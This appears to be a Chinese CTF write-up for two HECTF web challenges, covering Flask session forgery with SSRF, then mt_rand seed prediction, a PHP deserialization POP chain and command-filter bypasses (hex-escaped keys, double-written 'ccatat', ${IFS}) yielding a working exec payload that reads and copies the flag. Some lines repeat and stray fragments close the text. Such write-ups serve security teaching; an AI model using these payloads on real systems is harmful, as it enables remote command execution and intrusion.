伪装者
考点:http协议+flask的session伪造+ssrf读取文件
首先根据题目要求就行伪造HTTP
这里不多说,比较基础 然后下面得到是个登入 页面,我们输入zxk1ing
得到 说什么要白马王子 ,一眼session伪造
看到ey开头感觉是jwt 输入看看
得到key 那就直接flask session伪造就行
看到ey开头感觉是jwt 输入看看
得到key 那就直接flask session伪造就行
然后我们就得到 flag在这个路径下 试了下伪协议读取无果,发现有个url读取
测试一下ssrf读取 成功获得flag
EZphp
考点: 生成伪随机数 +PHP反序列化+命令执行的过滤绕过
首先进行抓包发现如下数据
根据 rand()? seed 看来就是根据seed这个种子来生成伪随机数来进行传参
我们写个脚本
<?php
mt_srand(1442660857);for($i=0;$i<1000;$i++){echo mt_rand()."\n";}然后将生产的数 做成一个字典进行爆破
得到 Unablet0guess.php 访问得到PHP反序列化
源码:
<?php
error_reporting(0);
highlight_file(__FILE__);class GGbond{public $candy;public function __call($func,$arg){$func($arg);}public function __toString(){return $this->candy->str;}
}class unser{public $obj;public $auth;public function __construct($obj,$name){$this->obj = $obj;$this->obj->auth = $name;}public function __destruct(){$this->obj->Welcome();}
}class HECTF{public $cmd;public function __invoke(){if($this->cmd){$this->cmd = preg_replace("/ls|cat|tac|more|sort|head|tail|nl|less|flag|cd|tee|bash|sh|&|^|>|<|\.| |'|`|\(|\"/i","",$this->cmd);}exec($this->cmd);}
}class heeectf{public $obj;public $flag = "Welcome";public $auth = "who are you?";public function Welcome(){if(unserialize($this->auth)=="zxk1ing"){$star = implode(array($this->obj,"⭐","⭐","⭐","⭐","⭐"));echo $star;}elseecho 'Welcome HECTF! Have fun!';}public function __get($get){$func = $this->flag;return $func();}
}new unser(new heeectf(),"user");$data = $_POST['data'];
if(!preg_match('/flag/i',$data))unserialize($data);
elseecho "想干嘛???"; Welcome HECTF! Have fun!这里的触发过程不难 ,难的是heeectf里面的一些考点,先找出口函数在HECTF里面的exec(),然后 就通过反推形成一条POP链:
unser.__destruct()->heeectf.welcome().->GGbond.__toString>heeectf.__get($get)>HECTF.__invoke()这里注意的welcome()函数里面
这个条件为真,那么 auth就要被赋值为序列化后的zxk1ing
所以为:
"s:7:\"zxk1ing\";"然后,第二点,在传参当中,存在一个if(!preg_match('/flag/i',$data)),因此,这里需要16进制绕过即可,具体方法就是前面的s大写,之后将f变为\66即可,这样就可以识别16进制编码了
最后
这里的绕过就采用双写绕过 空格使用${IFS} ,因为exec输出无回显 所以我们使用tee命令进行传输flag进行解题
咱们可以通过如下来验证代码是否正确
输入进去进行,如果左上角转了3s则成功
所以最终的代码:
<?phpclass GGbond{public $candy;}class unser{public $obj;public $auth="s:7:\"zxk1ing\";";}class HECTF{public $cmd = "cat /f* | tee a";
}class heeectf{public $obj;public $flag = "Welcome";public $auth = "s:7:\"zxk1ing\";";}
echo "<br/>";
$a = new unser(new HECTF(),"s:7:\"zxk1ing\";");
$a -> obj = new heeectf();
$a -> obj -> obj = new GGbond();
$a -> obj -> obj -> candy = new heeectf();
$a -> obj -> obj -> candy -> flag = new HECTF();
echo serialize($a);
得到
O:5:"unser":2:{s:3:"obj";O:7:"heeectf":3:{s:3:"obj";O:6:"GGbond":1:{s:5:"candy";O:7:"heeectf":3:{s:3:"obj";N;s:4:"flag";O:5:"HECTF":1:{s:3:"cmd";s:21:"ccatat /f* | tteeee B";}s:4:"auth";s:14:"s:7:"zxk1ing";";}}s:4:"flag";s:7:"Welcome";s:4:"auth";s:14:"s:7:"zxk1ing";";}s:4:"auth";s:14:"s:7:"zxk1ing";";}
产生的payload经过 16进制绕过 ,双写绕过 空格绕过 得到下面最终payload
data=O:5:"unser":2:{s:3:"obj";O:7:"heeectf":3:{s:3:"obj";O:6:"GGbond":1:{s:5:"candy";O:7:"heeectf":3:{s:3:"obj";N;S:4:"\66lag";O:5:"HECTF":1:{s:3:"cmd";s:41:"ccatat${IFS}/f*${IFS}|${IFS}tteeee${IFS}a";}s:4:"auth";s:14:"s:7:"zxk1ing";";}}S:4:"\66lag";s:7:"Welcome";s:4:"auth";s:14:"s:7:"zxk1ing";";}s:4:"auth";s:14:"s:7:"zxk1ing";";}然后传入访问a路径得到a文件 下载打开就为flag
:Linux文件与目录管理)
,实现SSH连接)
